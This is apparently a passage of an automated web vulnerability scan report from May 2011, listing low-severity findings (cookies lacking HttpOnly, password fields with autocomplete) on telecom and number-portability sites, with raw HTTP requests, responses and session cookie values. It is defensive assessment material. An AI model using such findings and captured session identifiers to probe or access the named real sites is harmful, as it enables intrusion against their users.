Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:12 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 3252
Last-Modified: Fri, 19 Sep 2008 10:26:54 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

// Move the selected items from list box1 to box2
function moveWithRefresh(lstbox1,lstbox2,doRefresh)
{
var box1Count = lstbox1.options.length;
for(var i=0; i < box1Count; i++)
{
if ( l
...[SNIP]...

13.98. http://www.vonage-forum.com/forum8.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vonage-forum.com
Path:	/forum8.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

phpbb2mysq_data=a%3A0%3A%7B%7D; expires=Fri, 11-May-2012 00:45:47 GMT; path=/; domain=www.vonage-forum.com
phpbb2mysq_sid=29e8b9dde66ce8864ecccdb3ea46feae; path=/; domain=www.vonage-forum.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forum8.html HTTP/1.1
Host: www.vonage-forum.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:45:47 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.4
X-Cache: cache vv2.1 - mysql
X-CacheDebug-1: Cache has been disabled!
Cache-Control: no-cache, pre-check=0, post-check=0
Expires: 0
Pragma: no-cache
X-CacheDebug-2: Callback happened
ETag: "d-876637965.92489"
Vary: Accept-Encoding
Set-Cookie: phpbb2mysq_data=a%3A0%3A%7B%7D; expires=Fri, 11-May-2012 00:45:47 GMT; path=/; domain=www.vonage-forum.com
Set-Cookie: phpbb2mysq_sid=29e8b9dde66ce8864ecccdb3ea46feae; path=/; domain=www.vonage-forum.com
Content-Type: text/html
Content-Length: 92489

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Vonage LNP . Local Number Portability Forum</title>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=IS
...[SNIP]...

13.99. http://www.vonage.com/lp/US/afflpdc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vonage.com
Path:	/lp/US/afflpdc/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

refer_id=AFLGN090801001W1; expires=Fri, 27-May-2011 00:50:29 GMT; path=/; domain=.vonage.com
LP=1%7E%7E; expires=Wed, 10-Aug-2011 00:50:30 GMT; path=/; domain=.vonage.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.100. http://www.vonage.com/lp/US/afflpdc/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vonage.com
Path:	/lp/US/afflpdc/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

LP=1%7E%7E; expires=Wed, 10-Aug-2011 00:50:30 GMT; path=/; domain=.vonage.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14. Password field with autocomplete enabled previous next
There are 27 instances of this issue:

http://forum.link2voip.com/favicon.ico
https://gvnwlnp.com/login.aspx
https://lnp.activationnow.com/lnp/jsp/logon/login.jsp
http://nanpa.org/
http://nanpa.org/
http://nanpa.org/about_overview.php
http://nanpa.org/about_overview.php
http://nanpa.org/awards_overview.php
http://nanpa.org/awards_overview.php
http://nanpa.org/education_overview.php
http://nanpa.org/education_overview.php
http://nanpa.org/history.php
http://nanpa.org/history.php
https://support.connexon.com/sd/AddSolution.sd
https://support.connexon.com/sd/Request.sd
https://support.connexon.com/sd/SolutionsHome.sd
http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
http://www.911enable.com/login/index.php
https://www.nationalnanpa.com/nas/security/authUser.do
https://www.nationalnanpa.com/nas/security/logon.do
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html
http://www.secviz.org/node/89

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

14.1. http://forum.link2voip.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forum.link2voip.com
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL:

http://forum.link2voip.com/ucp.php?mode=login

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.2. https://gvnwlnp.com/login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://gvnwlnp.com
Path:	/login.aspx

Issue detail

The page contains a form with the following action URL:

https://gvnwlnp.com/login.aspx

The form contains the following password field with autocomplete enabled:

ctl00$ContentPlaceHolder1$Login1$Password

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 00:50:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
LNP Login
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td class="ContainerControlColumn">
<input name="ctl00$ContentPlaceHolder1$Login1$Password" type="password" id="ctl00_ContentPlaceHolder1_Login1_Password" />
<span id="ctl00_ContentPlaceHolder1_Login1_PasswordRequired" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

14.3. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://lnp.activationnow.com
Path:	/lnp/jsp/logon/login.jsp

Issue detail

The page contains a form with the following action URL:

https://lnp.activationnow.com/lnp/jsp/logon/j_security_check

The form contains the following password field with autocomplete enabled:

j_password

Request

Response

HTTP/1.1 200 OK
Set-Cookie: LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Cache-Control: no-store
Date: Thu, 12 May 2011 00:50:20 GMT
Pragma: no-cache
Content-Length: 6277
Content-Type: text/html; charset=ISO-8859-1
Expires: Wed, 31 Dec 1969 23:59:59 GMT
X-Powered-By: Servlet/2.4 JSP/2.0

<html>
<!--
/*
* @(#)login.jsp 5/1/2001 11:55:44 AM
*
* Copyright 2001-2009 Synchronoss Technologies, Inc. 1525 Valley Center Parkway,
* Bethlehem, Pennsylvania, 18017, U.S.A. All Rights R
...[SNIP]...
<body>
<form action="j_security_check" method="post">
<!-- <form action="?action=login" method="post">
...[SNIP]...
<td class="logon-input" width="60%">
<input type="password" name="j_password" size="20">
</td>
...[SNIP]...

14.4. http://nanpa.org/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nanpa.org
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.nanpa.org/members.php

The form contains the following password field with autocomplete enabled:

text2

Request

GET / HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:38 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 24631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.5. http://nanpa.org/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nanpa.org
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.nanpa.org/members.php

The form contains the following password field with autocomplete enabled:

text2

Request

Response

14.6. http://nanpa.org/about_overview.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nanpa.org
Path:	/about_overview.php

Issue detail

The page contains a form with the following action URL:

https://www.nanpa.org/members.php

The form contains the following password field with autocomplete enabled:

text2

Request

GET /about_overview.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:19 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.7. http://nanpa.org/about_overview.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nanpa.org
Path:	/about_overview.php

Issue detail

The page contains a form with the following action URL:

https://www.nanpa.org/members.php

The form contains the following password field with autocomplete enabled:

text2

Request

Response

14.8. http://nanpa.org/awards_overview.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nanpa.org
Path:	/awards_overview.php

Issue detail

The page contains a form with the following action URL:

https://www.nanpa.org/members.php

The form contains the following password field with autocomplete enabled:

text2

Request

GET /awards_overview.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/education_overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:05:01 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.9. http://nanpa.org/awards_overview.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nanpa.org
Path:	/awards_overview.php

Issue detail

The page contains a form with the following action URL:

https://www.nanpa.org/members.php

The form contains the following password field with autocomplete enabled:

text2

Request

Response

14.10. http://nanpa.org/education_overview.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nanpa.org
Path:	/education_overview.php

Issue detail

The page contains a form with the following action URL:

https://www.nanpa.org/members.php

The form contains the following password field with autocomplete enabled:

text2

Request

GET /education_overview.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/history.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:59 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.11. http://nanpa.org/education_overview.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nanpa.org
Path:	/education_overview.php

Issue detail

The page contains a form with the following action URL:

https://www.nanpa.org/members.php

The form contains the following password field with autocomplete enabled:

text2

Request

Response

14.12. http://nanpa.org/history.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nanpa.org
Path:	/history.php

Issue detail

The page contains a form with the following action URL:

https://www.nanpa.org/members.php

The form contains the following password field with autocomplete enabled:

text2

Request

GET /history.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/about_overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:49 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 37882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.13. http://nanpa.org/history.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nanpa.org
Path:	/history.php

Issue detail

The page contains a form with the following action URL:

https://www.nanpa.org/members.php

The form contains the following password field with autocomplete enabled:

text2

Request

Response

14.14. https://support.connexon.com/sd/AddSolution.sd previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://support.connexon.com
Path:	/sd/AddSolution.sd

Issue detail

The page contains a form with the following action URL:

https://support.connexon.com/HomePage.do?fromCustomer=customerportal

The form contains the following password field with autocomplete enabled:

password

Request

GET /sd/AddSolution.sd?solID=37 HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: JSESSIONID=1CB498ABEDA80407FB8612A864D425DE; PREV_CONTEXT_PATH=; JSESSIONID=8E7ACD94D937E2DF6367A9E55BD677BE

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/sd; Expires=Fri, 13-May-2011 01:08:56 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:55 GMT
Server: Apache-Coyote/1.1
Content-Length: 6546

<link type="text/css" rel="stylesheet" href="/style/style.css?7607"/>
<link rel="SHORTCUT ICON" href="/images/favicon.ico"/>

<script>var isPortalEnabled = 'true';</script>
<link type="te
...[SNIP]...
<div id="PortalContRight" style="float:right;">

                   <form action="/HomePage.do?fromCustomer=customerportal" method="post" name='login'>

                   <table cellpadding="5" cellspacing="1pt" bgcolor="#cfcfcf" border="0" width="100%" align="center" >
...[SNIP]...
<td align="center"><input name="password" type="password" class="formStyle" style="width:90%;" > </td>
...[SNIP]...

14.15. https://support.connexon.com/sd/Request.sd previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://support.connexon.com
Path:	/sd/Request.sd

Issue detail

The page contains a form with the following action URL:

https://support.connexon.com/HomePage.do?fromCustomer=customerportal

The form contains the following password field with autocomplete enabled:

password

Request

GET /sd/Request.sd?mode=AddNew HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: JSESSIONID=1CB498ABEDA80407FB8612A864D425DE; PREV_CONTEXT_PATH=/sd; JSESSIONID=8E7ACD94D937E2DF6367A9E55BD677BE

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/sd; Expires=Fri, 13-May-2011 01:08:58 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:57 GMT
Server: Apache-Coyote/1.1
Content-Length: 12530

<link type="text/css" rel="stylesheet" href="/style/style.css?7607"/>
<link rel="SHORTCUT ICON" href="/images/favicon.ico"/>

<script>var isPortalEnabled = 'true';</script>
<link type="tex
...[SNIP]...
<div id="PortalContRight" style="float:right;">

                   <form action="/HomePage.do?fromCustomer=customerportal" method="post" name='login'>

                   <table cellpadding="5" cellspacing="1pt" bgcolor="#cfcfcf" border="0" width="100%" align="center" >
...[SNIP]...
<td align="center"><input name="password" type="password" class="formStyle" style="width:90%;" > </td>
...[SNIP]...

14.16. https://support.connexon.com/sd/SolutionsHome.sd previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://support.connexon.com
Path:	/sd/SolutionsHome.sd

Issue detail

The page contains a form with the following action URL:

https://support.connexon.com/HomePage.do?fromCustomer=customerportal

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=270247465902DF59F63589A1CC79528E; Path=/sd
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/sd; Expires=Fri, 13-May-2011 01:08:08 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:08 GMT
Server: Apache-Coyote/1.1
Content-Length: 13742

<html>
<link type="text/css" rel="stylesheet" href="../style/style.css?aa">
<link type="text/css" rel="stylesheet" href="../style/demo.css">
<link rel="SHORTCUT ICON" hre
...[SNIP]...
<div id="PortalContRight" style="float:right;">

                   <form action="/HomePage.do?fromCustomer=customerportal" method="post" name='login'>

                   <table cellpadding="5" cellspacing="1pt" bgcolor="#cfcfcf" border="0" width="100%" align="center" >
...[SNIP]...
<td align="center"><input name="password" type="password" class="formStyle" style="width:90%;" > </td>
...[SNIP]...

14.17. http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://support.sprint.com
Path:	/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

Issue detail

The page contains a form with the following action URL:

https://mysprint.sprint.com/entrycheck/login.fcc

The form contains the following password field with autocomplete enabled:

PASSWORD

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: Apache=173.193.214.243.1305161164637776; path=/
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
Set-Cookie: JSESSIONID=E03DE23D7995866D54F37C7F07F26CB3.support4; Path=/
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLFByb2plY3RJbnN0YWxsLzkuMCBbIERQU0xpY2Vuc2UvMCBCMkJMaWNlbnNlLzAgIF0=
cache-control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: RecentlyViewedArticle=case-wh164052-20100420-140547:article_text; Expires=Sat, 11-Jun-2011 00:55:43 GMT; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 65521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml
...[SNIP]...
<div id="userLoginContent" class="disclosureContent">            <form id="frmUserLogin" name="Login" method="post" action="https://mysprint.sprint.com/entrycheck/login.fcc">                                <fieldset>
...[SNIP]...
<br />                        <input type="password" name="PASSWORD" tabindex="2" id="txtLoginPassword" class="text" maxlength="33"/><br />
...[SNIP]...

14.18. http://www.911enable.com/login/index.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.911enable.com
Path:	/login/index.php

Issue detail

The page contains a form with the following action URL:

https://www.911enable.com/911form/login_process.php

The form contains the following password field with autocomplete enabled:

pass

Request

GET /login/index.php HTTP/1.1
Host: www.911enable.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.911enable.com/business.php
Cookie: __utma=49897326.2023569351.1305162385.1305162385.1305162385.1; __utmb=49897326.4.10.1305162385; __utmc=49897326; __utmz=49897326.1305162385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:06:54 GMT
Content-Length: 18966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- InstanceBegin template="/Tem
...[SNIP]...
<p style="width:445px;">
<form method="post" action="https://www.911enable.com/911form/login_process.php" enctype="multipart/form-data">
<table id="requestFormTable">
...[SNIP]...
<td><input type="password" name="pass" class="formText" style="width:130px;" /></td>
...[SNIP]...

14.19. https://www.nationalnanpa.com/nas/security/authUser.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.nationalnanpa.com
Path:	/nas/security/authUser.do

Issue detail

The page contains a form with the following action URL:

https://www.nationalnanpa.com/nas/security/logon.do?function=signon

The form contains the following password field with autocomplete enabled:

password

Request

GET /nas/security/authUser.do?function=verifySignIn HTTP/1.1
Host: www.nationalnanpa.com
Connection: keep-alive
Referer: http://www.nationalnanpa.com/number_resource_info/area_code_maps.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596; BIGipServernas-ns=2869930176.20480.0000; __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1; __utmc=82268809; __utmb=82268809.2.10.1305158784

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:31 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 7557

<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
</script>

<form name="loginForm" method="post" action="/nas/security/logon.do?function=signon" onsubmit="return validate();"><input type="hidden" name="org.apache.struts.taglib.html.TOKEN" value="fc55bb28097906d9b23bc17edb76d94d">
...[SNIP]...
<td width="65%" valign="middle" align="left">
<input type="password" name="password" maxlength="30" size="20" value="">
</td>
...[SNIP]...

14.20. https://www.nationalnanpa.com/nas/security/logon.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.nationalnanpa.com
Path:	/nas/security/logon.do

Issue detail

The page contains a form with the following action URL:

https://www.nationalnanpa.com/nas/security/logon.do?function=signon

The form contains the following password field with autocomplete enabled:

password

Request

GET /nas/security/logon.do;nanpaid=PbtxNLkWc1vbGTPPjJJ6vh7sQPWwtrp8yq10ytK0spRy8vN5RTQB!-242160596?function=signon HTTP/1.1
Host: www.nationalnanpa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
